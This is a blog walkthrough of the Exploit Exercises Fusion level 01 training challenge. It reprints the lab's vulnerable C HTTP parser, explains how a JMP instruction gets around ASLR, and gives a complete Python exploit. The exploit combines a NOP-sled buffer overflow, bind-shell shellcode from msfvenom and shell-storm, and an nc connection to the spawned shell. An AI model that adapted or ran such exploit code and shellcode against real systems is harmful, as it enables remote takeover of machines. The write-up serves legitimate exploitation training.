Exploit Exercise Binary Exploitation Fusion Level 01

Hello Friends,



Welcome Again . Today, I am going to share my another walk through experience of Exploit exercise fusion level 01. Basically, This Level is complete copy of previous level but here, the only difference is ASLR (Address Space Layout Randomization). Don't forget to Check Exploit Exercise Fusion level 00

So, Let's start.

Hint

This is a simple introduction to get you warmed up. 
The return address is supplied in case your memory needs a jog :)

Hint: Storing your shellcode inside of the fix_path ‘resolved’ buffer might be a
 bad idea due to character restrictions due to realpath(). Instead, there is 
plenty of room after the HTTP/1.1 that you can use that will be ideal (and much larger).

Source Code

#include "../common/common.c"    

int fix_path(char *path)
{
  char resolved[128]
  
  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved);
}

char *parse_http_request()
{
  char buffer[1024];
  char *path;
  char *q;

  printf("[debug] buffer is at 0x%08x :-)\n", buffer);

  if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
  if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

  path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;
  if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

  fix_path(path);

  printf("trying to access %s\n", path);

  return path;
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID); 
  fd = serve_forever(PORT);
  set_io(fd);

  parse_http_request(); 
}

Here, Our problem is ALSR. well, after spending my valuable time in research and GDB testing. I found a way to bypass this problem.

Actually, Here Our Exact Problem is Random Space Of Injected Shell code Starting Point. So, We just need to point EIP to Starting of Our Shell code.

Well, Our Solution is JMP instruction. Those guys who don't know about it. Start google now. JMP instruction are like a small bytes of Instruction which Instruct EIP to Jump from One Address To Another.

Like we want to jump our EIP 39 Bytes Then Our Instruction will be

Disassembly:
0:  eb 25                   jmp    0x27

Inject like this (String Literal)

"\xEB\x25"


Basically, This Command Will Instruct EIP to Jump 39 Bytes Forward From Current Position. Simple.

Further Details left over User to Understand it Yourself.

Here, is my exploit

#!/usr/bin/python

# import modules
import socket
import struct
import os

# Target Configurations
TARGET_IP = raw_input('[+] Enter Target IP [default 192.168.43.231] : ') or '192.168.43.231'
TARGET_PORT = 20001

# create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# file descriptor
sf = s.makefile("rw")

# connect
s.connect((TARGET_IP, TARGET_PORT))

# ===================================================================
#             Unsuccessful Payload Created From MSFVENOM
# ===================================================================
# cmd
#    msfvenom -p linux/x86/shell/bind_tcp -n 200 -f py -b '\x00\xff'
buf =  ""
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB' # xor [eax, ebx, ecx, edx]
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB\x31\xF6\x31\xFF'
buf += "\x93\x41\x2f\x43\x48\xfc\x41\x49\x9b\x9b\x93\xf9\x9b"
buf += "\x2f\xfc\x9b\xf9\x90\x3f\x92\x93\x4b\x40\x49\x49\x92"
buf += "\xf9\x37\x92\x42\x43\x41\x91\x4b\xfd\xfc\x41\x91\x4a"
buf += "\x90\x27\xf5\x27\x90\x49\x2f\xf9\x43\x48\x42\x90\x4b"
buf += "\x2f\x37\xfc\x99\xfc\xf8\x9b\x9f\x92\x37\x4b\x93\x48"
buf += "\x43\x9f\x98\xf8\xf5\x93\x40\xf5\x41\x27\x40\x93\x3f"
buf += "\x4a\x9b\x93\x37\x41\x9f\xf8\x49\xf9\x41\xf5\x49\x91"
buf += "\x41\x42\x2f\x99\x90\x99\xf5\x37\xf9\x93\x9b\x2f\xf8"
buf += "\xf8\x41\x93\xf5\x42\x93\x49\xfc\xf5\x40\x37\x4b\x90"
buf += "\x43\xd6\x9f\xd6\x48\xf8\x42\x90\x49\x49\x2f\x2f\x37"
buf += "\x43\x92\xf8\x40\x9b\xfc\x91\x9f\x40\x40\x9f\xf8\xf8"
buf += "\x9b\xfd\xf9\x92\x91\x98\x42\x43\xfc\x49\x90\x9b\x98"
buf += "\x42\x98\x9b\x3f\x27\x40\xf8\xfd\x99\xf5\xfc\x4a\x27"
buf += "\xf8\x27\xfd\x43\x37\x49\x92\x9b\x49\x9f\x43\xd6\x92"
buf += "\x27\xfd\x4b\xfd\xf8\x49\x9f\xfc\xf8\x4a\x48\x49\x4b"
buf += "\x4b\x49\x99\x40\x92\xbe\x99\x74\x93\xf3\xda\xcb\xd9"
buf += "\x74\x24\xf4\x5d\x31\xc9\xb1\x1c\x31\x75\x14\x83\xed"
buf += "\xfc\x03\x75\x10\x7b\x81\xf9\x8e\x23\xf3\x4c\x77\x6a"
buf += "\x03\xa1\x78\x8c\x8d\x22\x1e\x0d\x6e\xa4\x2f\xc0\xf1"
buf += "\x94\x14\x2d\x12\x85\xe9\x82\xbf\x28\x67\xc5\xf0\x4b"
buf += "\xba\x85\xa0\xf9\x40\xd1\x28\xfc\x22\xd8\xfc\x97\x3a"
buf += "\x3b\x96\x99\x67\xd1\x01\xfe\x5a\xa5\x59\x7d\xa0\xb1"
buf += "\x3c\xd9\x77\xeb\xd6\xdf\x87\x1a\x7b\x8a\x97\x4d\xd3"
buf += "\xc3\x79\x07\xb5\x8b\xb4\x57\xe8\xcf\xf7\x31\xc6\x90"
buf += "\xa8\xfe\x68\xf6\xc1\x51\x8d\x3a\x51\xc2\x3b\xc8\xe2"
buf += "\xe7\x8e\x51\x85\x38\x4b\xe2\x8c\x0b\xec\xfd\x70"

# ================================================================
#                         Another Payload, 
# ===============================================================
# url :
#      http://shell-storm.org/shellcode/files/shellcode-882.php

buf  = ''
buf +="\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"



payload = ''
payload += 'GET '
payload += '\x90'*137 + '\xeb\x25'

payload+= struct.pack("I", 0x80488b9)
payload += '/'      # <--- To Stop Realpath function from overwriting return address
payload += '\x90'*200

# ShellCode here
payload += buf
payload += '\x90'*400


payload+= ' HTTP/1.1'

s.send(payload)
#print sf.read(30)


s.settimeout(3)

s.settimeout(3)
print "[+] Wait For Response"
try:
 print [sf.read(len('trying to access %s\n')+10)]
 print "[-] If You Are Reading This Message Then Probably Exploit failed."
 input("[-] Exit. Trying Again..")
 s.close()
except:
 print "[+] Starting Bind TCP Shell."
 print "[+] Use Commands Carefully."
 os.system('nc {} 1337'.format(TARGET_IP))



Check Exploit Exercise Fusion level 00


Don't forget to comment below some appreciable sentences.

Share this

Related Posts

Previous
Next Post »